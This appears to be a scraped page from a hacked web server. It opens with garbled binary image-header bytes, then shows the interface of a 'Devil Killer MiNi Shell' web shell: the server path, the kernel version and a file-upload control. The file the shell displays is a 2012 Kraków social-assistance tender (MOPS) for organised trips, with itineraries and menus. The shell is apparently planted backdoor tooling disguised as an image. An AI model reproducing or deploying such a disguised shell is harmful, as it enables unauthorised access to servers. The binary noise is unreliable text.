JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/103027-N-2012.html

<p class="kh_header"><b>Kraków: Zakup usług turystycznych w związku z realizacją projektów socjalnych prowadzonych przez MOPS w Krakowie</b><br>
<b>Numer ogłoszenia: 103027 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług turystycznych w związku z realizacją projektów socjalnych prowadzonych przez MOPS w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup usług turystycznych w związku z realizacją projektów socjalnych prowadzonych przez MOPS w Krakowie, zgodnie z poniższymi wytycznymi:

I część zamówienia

1.	Wycieczka do Rabki:
1)	Termin wycieczki: 11.06.2012 r.
2)	Ilość uczestników: 42 + 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki:
a)	godz. 8:00 zbiórka uczestników pod budynkiem MOPS Filia Nr 9 os. Teatralne 24
b)	godz. 8:15 wyjazd 
c)	godz. 10:00 przyjazd do Rabki 
d)	godz. 10:00 - 13:00 organizacja zwiedzania: 
	spacer ścieżką edukacyjną z wykorzystaniem kijków do nordic walkingu (kije zapewni Zamawiający),
	Rodzinny Park Rozrywki Rabkoland - Wykonawca zapewni minimum 5 żetonów uprawniających do korzystania z usług parku dla każdego uczestnika,
	Muzeum Orderu Uśmiechu
	drewniany kościół p.w. św. Marii Magdaleny
	Muzeum Regionalne im. Władysława Orkana
Skansen Taboru Kolejowego w Chabówce 
e)	godz. 13:00-14:00 obiad w restauracji usytuowanej w pobliżu Parku Zdrojowym w Rabce wg menu na osobę :
	zupa ogórkowa z ryżem 250 ml.
	pieczeń wieprzowa duszona 170 g, ziemniaki puree 150 g,  buraczki zasmażane 200 g,  sok z czarnej porzeczki 250 ml
f)	godz. 14:00 - 15:00 spacer po Parku Zdrojowym, Tężnia Solankowa, Pijalnia Wód (każdy uczestnik otrzyma 0,5 l wody mineralnej )
g)	godz. 15:00 - 18:00 warsztaty w pracowni garncarskiej,
h)	godz. 18:00 podwieczorek wg menu na każdego uczestnika:
	kebab drobiowy 400 g
	herbata 250 ml
i)	godz. 18:30-20:30 warsztaty psychoedukacyjne organizowane przez pracowników Zamawiającego w Parku Zdrojowym.
j)	godz. 20:30 wyjazd z Rabki
k)	godz. 22:00 powrót do Krakowa

 
2.	Wycieczka do Baranowa Sandomierskiego, Sandomierza i Kazimierza Dolnego 
1)	Termin wycieczki: 25-27.06.2012 r.
2)	Ilość uczestników: 42 + 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki:

Dzień 1 
a)	godz. 5:30 zbiórka uczestników pod budynkiem MOPS Filia Nr 9 os. Teatralne 24
b)	godz. 5:45 wyjazd 
c)	godz. 9:00 przyjazd do miejsca zakwaterowania 
d)	godz. 9:00 - 9:30 zakwaterowanie 
e)	godz. 10:00 - 13:00 organizacja zwiedzania
	Sandomierskie Lochy, 
	Dom Jana Długosza, 
	Muzeum Okręgowe,  
	Zamek Sandomierski 
f)	godz. 13:00 - 13:45 obiad zgodnie z menu na osobę; 
	zupa  pieczarkowa z makaronem 250 ml.,
	gulasz wołowy 180 g., 
	kasza gryczana 150g lub ziemniaki puree 150 g, 
	surówka z marchewki 150g, 
	kompot z truskawek 250 ml., 
g)	godz. 14:45 - 18:00 organizacja zwiedzania; 
	Park Miejski, 
	Góry Pieprzowe, 
	Wąwóz Królowej Jadwigi, 
	Park Piszczele, 
	Wzgórze Solne Regina.
h)	godz. 18:00 - 19:00 rejs po Wiśle 
i)	godz. 19:00 - 19:30 kolacja w miejscu zakwaterowania lub w miejscu odległym do 200 m od miejsca zakwaterowania, zgodnie z menu na osobę:
	pasztet pieczony - 60 g., 
wędlina drobiowa - 80 g. 
	chleb wiejski 120g, 
	ogórek/pomidor 100g., 
herbata 250 ml, 
	cukier 10g., 
	masło 15 g., 
	dżem/powidło 50 g.
	20:00 - 21:00 warsztaty psychoedukacyjne organizowane przez pracowników Zamawiającego 

Dzień 2 
a)	godz. 8:00 - 9:00 śniadanie w miejscu zakwaterowania lub w miejscu odległym do 200 m od miejsca zakwaterowania, zgodnie z menu na osobę:  
	ser twarogowy ziarnisty 150 g ,
	polędwica luksusowa 60 g., 
	pasztet pieczony - 60 g, 
	ogórek/pomidor 100g
	ciasto drożdżowe 50 g, 
	chleb wiejski 120 g, 
	dżem z czarnych porzeczek niskosłodzony/miód 50 g, 
	herbata 250 ml, 
	cukier 10 g , 
	masło 15g
b)	godz. 9:30 -11:00 przejazd do Kazimierza Dolnego,
c)	godz. 11:00 - 13:00 organizacja Zwiedzania 
	rynek, 
	mały rynek, 
	Góra Trzech Krzyży, 
	zamek i baszta, 
	kościół farny,
	kościół i klasztor Franciszkanów,
	Muzeum Przyrodnicze,
	spichlerze, drewniane jatki
d)	godz. 13:00 - 13:45 obiad zgodnie z menu na osobę:
		rosół z makaronem 250 ml, 
	kotlet schabowy panierowany 180 g, 
	ziemniaki puree 150 g, 
	marchewka zasmażana 150 g., 
	kompot wieloowocowy 250 ml
e)	godz. 14:15 - 15:45 rejs statkiem 
f)	godz. 16:00 wyjazd z Kazimierza do miejsca zakwaterowania 
g)	godz. 19:00 - 19:30 kolacja kolacji w miejscu zakwaterowania lub w miejscu odległym do 200 m od miejsca zakwaterowania, zgodnie z menu na osobę:
	kiełbasa krakowska 60 g, 
	parówki drobiowe 160 g, 
	chleb wiejski 120 g, 
	rogal maślany/bułka maślana, 
	ogórek/pomidor 100g
	herbata 250 ml, 
	cukier 10 g ,  
	masło 15 g, 
	ketchup/musztarda 10 g
h)	godz. 20:00 - 21:00 warsztaty psychoedukacyjne organizowane przez pracowników MOPS

Dzień 3 
a)	godz. 8:00 - 9:00 pakowanie i wymeldowanie z miejsca zakwaterowania
b)	godz. 9:00 - 9:45 śniadanie w miejscu zakwaterowania lub w miejscu odległym do 
200 m od miejsca zakwaterowania, zgodnie z menu na osobę
	ser Tylżycki pełnotłusty 80 g, 
	jajecznica 150 g, 
	szynka wołowa gotowana 80g, 
	rogal francuski/jagodzianka 80 g, 
	ogórek/pomidor 100g, 
	chleb wiejski 120 g
	dżem truskawkowy niskosłodzony/miód 50 g, 
	herbata 250 ml, 
	cukier 10 g, 
	masło 15g.
c)	godz. 10.00 wyjazd do Baranowa Sandomierskiego 
d)	godz. 11:00 - 13:30 organizacja zwiedzania zamku: przejście przez park, arkadowy dziedziniec zamku, secesyjna kaplica zamkowa, wnętrza historyczne I piętra, wystawa stała Skarby Ziemi, wystawa czasowa.
e)	godz. 13:45 -14.30 obiad, zgodnie z menu na osobę;
	zupa koperkowa 250 ml.
	karkówka z grilla 200g, 
	frytki 200 g, 
	zestaw surówek 4 rodzaje 150 g, 
	kompot 250 ml, 
f)	godz. 15.00 wyjazd z Baranowa Sandomierskiego
g)	godz. 19.00 przyjazd do Krakowa.

Wykonawca zapewni 2 noclegi w Sandomierzu lub ośrodku położonym nie dalej niż 
15 km od Sandomierza o następującym standardzie:
	dostęp do Internetu,
	dostęp do TV,
	miejsca na ognisko, grill,
	dostęp do aneksu kuchennego,
	parking,
	plac zabaw dla dzieci,
	pokoje z łazienkami 2 lub 3 lub 4 - osobowe
	wyposażenie łazienek w ręczniki oraz mydło,
	łóżka jednoosobowe (Zamawiający nie dopuszcza łóżek piętrowych) 

3.	Wycieczka do Kielc i Sielpi
1)	Termin wycieczki: 7.09.2012 r.
2)	Ilość uczestników: 42 + 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki:
a)	godz. 7:00 zbiórka uczestników pod budynkiem MOPS Filia Nr 9 os. Teatralne 24
b)	godz. 7:15 wyjazd 
c)	godz. 9:15 -12:30 organizacja zwiedzania:
	Pałac Biskupów Krakowskich,
	Muzeum Narodowe,
	Wzgórze Zamkowe i Bazylika Katedralna,
	Kadzielnia,
	Karczówka, 
	Egzotarium Żywych Gadów Dolina Gadów
	Muzeum Zabawek i Zabawy 
d)	godz. 12.30 -13.00 obiad, zgodnie z menu na osobę;
	krem pomidorowy z bazylią i grzankami serowymi 250 ml
	kotlet de volaille 180 g, 
	frytki 150 g, 
	surówka z kapusty pekińskiej 150g, 
	kompot z jabłek 250 ml.
e)	godz. 13:15 - przejazd do Sielpii 
f)	godz. 14.00-14.45 zwiedzanie Muzeum Zagłębia Staropolskiego 
g)	godz. 14.45 -16.15 spacer po Sielpii  
h)	godz. 16:15 - 17:15 warsztaty zdrowego żywienia w formie pikniku nad jeziorem Sielpia, prowadzone przez pracowników Zamawiającego  (nauka samodzielnego przygotowania zdrowych zbilansowanych posiłków). Produkty do przygotowania posiłków zapewni Wykonawca wg. menu na osobę:
	polędwica luksusowa 60 g, 
	pasztet pieczony - 60 g, 
	ogórek/pomidor 100g, 
	ciasto drożdżowe 50 g, 
	chleb wiejski 120 g, 
	dżem z czarnych porzeczek niskosłodzony/miód 50 g, 
	herbata 250 ml, 
	cukier 10 g , 
	masło 15 g, 
	jabłko, 
	wafel czekoladowy typu Grzesiek
i)	godz. 17:15 - 18:00 warsztaty psychoedukacyjne organizowane przez pracowników Zamawiającego nad jeziorem Sielpia.
j)	godz. 18:00  wyjazd z Sielpii 
k)	godz. 20:30 przyjazd do Krakowa

4.	Wycieczka do Gładyszowa
1)	Termin wycieczki: 14.12.2012 r.
2)	Ilość uczestników: 42 + 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki:
a)	godz. 8:00 zbiórka uczestników pod budynkiem MOPS Filia Nr 9 os. Teatralne 24
b)	godz. 8:15 wyjazd 
c)	godz. 11:30 przyjazd do Gładyszowa 
d)	godz. 11:30 - 12:30 organizacja zwiedzania stadniny koni oraz zajęcia teoretyczne dotyczące:
	zasad organizacji stajni, 
	zarysu historii jeździectwa, 
	pochodzenia i rasy koni, 
	sprzętu jeździeckiego (siodła, ogłowia, kiełzna, pomoce), 
	obsługi, higieny i karmienia koni, 
	nauki siodłania. 
e)	godz. 12:30 - 14:00 warsztaty psychoedukacyjne  organizowane przez pracowników Zamawiającego na terenie stadniny koni 
f)	godz. 14:00 - 16:00 obiad z udziałem kapeli ludowej, zgodnie z menu na osobę;
	opłatek 1szt., 
	barszcz czerwony z uszkami 250 ml., 
	filet z karpia smażonego w panierce 200 g, 
	purre ziemniaczane 150 g, 
	pieczarki zasmażane 150 g, 
	surówka z marchewki i jabłka 100 g,
	kompot z suszonych śliwek 250 ml, 
	ryba po grecku 200 g,
	sałatka jarzynowa 200 g, 
	sałatka śledziowa 200 g, 
	szynka polska gotowana 100 g, 
	półmisek kanapek dekoracyjnych 400 g, 
	ciasto makowiec 100g, 
	sernik 100g,  
	pieczywo 200 g, 
	kawa 250 ml, herbata 250 ml, cukier 
g)	godz. 16:00 - 16:40 organizacja kuligu (zaprzęgi składające się z  pary koni i duże sań wyposażonych w pledy do przykrycia oraz w pochodnie. W przypadku braku śniegu i opadów deszczu kulig odbędzie się z wykorzystaniem zadaszonych wozów). 
h)	godz. 16:45 - 18:00 ognisko lub w przypadku opadów deszczu - grill, zgodnie z menu na osobe:
	dwie porcje kiełbasy - 120 g każda, 
	chleb 200 g. 
	ketchup, musztarda, 
	herbata 500 ml, 
	cukier 
Wykonawca zapewni jednorazowe tacki, sztućce oraz serwetki.
i)	18.00 wyjazd z Gładyszowa 
j)	21:00 przyjazd do Krakowa 


II część zamówienia

1.	Wycieczka do Szczyrzyca 
1)	Termin wycieczki: 18.06.2012 r.
2)	Ilość uczestników: 40 + 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki:
a)	godz. 7;00 zbiórka uczestników pod budynkiem MOPS Filia Nr 9 os. Teatralne 24
b)	godz. 7:15 wyjazd 
c)	godz. 9:00 przyjazd do Szczyrzyca  
d)	godz. 9:15 - 10:00 organizacja mszy świętej dla uczestników wycieczki w kościele  p.w. NMP Wniebowziętej i św. Stanisława BM w Szczyrzycu
e)	godz. 10:00 - 13:00 organizacja zwiedzania wioski indiańskiej z przewodnikiem (zapoznanie z elementami kultury indiańskiej, wnętrze tipi, szałas potu, wystawa rękodzieła)
f)	warsztaty muzyczne (nauka indiańskiej pieśni, prezentacja instrumentów etnicznych z różnych stron świata: aborygeńskie didgeridoo, afrykańskie bębny, patyk deszczowy, indiański i tybetański flet)
g)	godz. 13:00-14:00 obiad wg menu na osobę 
	rosół z makaronem 250 ml
		pierś z kurczaka panierowana 150 g
	ziemniaki całe z koperkiem 300 g
		surówka z selera 150 g
		kompot wieloowocowy 250 ml 
h)	godz. 14:00 - 15:00 zwiedzanie Muzeum Klasztornego OO. Cystersów w Szczyrzycu.
i)	godz. 15:00 - 16:00 warsztaty rękodzielnicze (nauka wykonywania indiańskich amuletów)
j)	godz. 16:00 - 17:30 warsztaty integracyjne organizowane przez pracowników Zamawiającego na terenie wioski indiańskiej
k)	godz. 17:30 - 18:30 organizacja ogniska lub (w przypadku niekorzystnych warunków atmosferycznych) grilla, wg menu na osobę: 
	pieczywo 200 g
	ketchup/musztarda 10g
	kiełbasa na gorąco 200g
	herbata 250 ml
	cukier 10 g 
	sztućce jednorazowe , tacki jednorazowe, serwetki
l)	godz. 18:30 wyjazd 
m)	godz. 20:15 powrót do Krakowa 

2.	Wycieczka do Cieszyna
1)	Termin wycieczki: 17.12.2012 r.
2)	Ilość uczestników: 40 + 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki:
a)	godz. 7:00 zbiórka uczestników pod budynkiem MOPS Filia Nr 9 os. Teatralne 24
b)	godz. 7:15 wyjazd 
c)	godz. 10:00 - 13:00 organizacja zwiedzania
	wzgórze zamkowe: Wieża Piastowska, rotunda św. Mikołaja, Wieża Ostatecznej Obrony
	stare miasto: rynek z zabytkowymi kamienicami, ratuszem i studnią z figurą św. Floriana, kościół parafialny p.w. św. Marii Magdaleny, kościół Jezusowy, pałac, Studnia Trzech Braci, kościół i klasztor Bonifratrów, Pałac Myśliwski Habsburgów, zabytkowy browar 
d)	godz. 13:00 -14:00 lekcja muzealna w Muzeum Drukarstwa 
e)	godz. 14:30 - 17:30 obiad w restauracji na terenie Cieszyna, połączony z kolędowaniem przy akompaniamencie kapeli góralskiej, wg menu na osobę:
	opłatek 1szt., 
	zupa grzybowa z łazankami 250 ml., 
	karp smażony 150 g, 
	piernik staropolski z bakaliami 150 g, 
	pieczarki faszerowane 150 g, 
	surówka z kapusty kiszonej 100 g, 
	śledź po królewsku 100g, 
	pasztet pieczony 60 g., 
	schab pieczony ze śliwką 150 g. 
	sałatka pieczarkowa 200 g, 
	pieczywo 150 g. 
	kawa 250 ml, herbata 250 ml., cukier 
f)	godz. 17:45- Wyjazd z Cieszyna 
g)	godz. powrót do Krakowa 

Wykonawca zapewni (dotyczy I i II części zamówienia):
	bilety wstępu do zwiedzanych obiektów, 
	pokrycie opłat parkingowych, 
	opiekę przewodnika podczas zwiedzania obiektów, 
	transport autokarowy  (autokar wyposażony w: WC, barek, DVD, klimatyzację)  Autokar ma być dostępny przez cały czas trwania wycieczki. Wykonawca zapewni sprawdzenie stanu technicznego autokaru przez Policję w dniu wyjazdu. Kierowca musi uzyskać protokół dopuszczenia pojazdu i kierowcy do przewozu osób. Kierowca musi posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika. Wykonawca zapewni autokar sprawny technicznie. Przewoźnik musi posiadać wymagane prawem ubezpieczenia. Kierowca jest zobowiązany do dbania o czystość autokaru podczas podróży (zewnątrz jak i wewnątrz).
	dostęp do bezpłatnej kawy/herbaty serwowanej przez kierowcę autokaru na postojach w ilości 250 ml na osobę,
	butelkę wody mineralnej gazowanej lub nie gazowanej (do wyboru) dla każdego uczestnika o pojemności 0,75 l w każdym dniu wycieczki,
	właściwą jakość przygotowanego posiłku z uwzględnieniem temperatury i innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz przepisów ustawy o Państwowej Inspekcji Sanitarnej, 
	ubezpieczenie wszystkich uczestników od następstw nieszczęśliwych wypadków (NNW) na kwotę co najmniej 10 000 zł. na każdego uczestnika. Uczestnicy wyjazdu muszą zostać ubezpieczeni od następstw nieszczęśliwych wypadków  w  trakcie przejazdów oraz w trakcie trwania wyjazdu oraz kosztów leczenia Wykonawca przedłoży Zamawiającemu polisę -   umowę ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu,
	bilety komunikacji zbiorowej w przypadku konieczności poruszania się takimi środkami transportu,
	materiały piśmiennicze dla każdego uczestnika każdego wyjazdu.: blok rysunkowy A4 - 1 szt., długopis typu Zenith - 1 szt., zestaw 2 szt. pisaków: czerwony i czarny,
	świadczenia dla opiekunów ze strony Zamawiającego takie same jak dla uczestników wycieczek.

Zamawiający dopuszcza możliwość zmiany kolejności zwiedzania i harmonogramu wycieczek oraz dopuszcza możliwość zmiany terminu jeżeli warunki atmosferyczne lub inne czynniki niezależne od Zamawiającego będą uzasadniały przesunięcie terminu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca lub podwykonawca musi posiadać wpis do Rejestru Organizatorów Turystyki i Pośredników  Turystycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia oraz warunki płatności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=48483<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2012 godzina 09:30, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

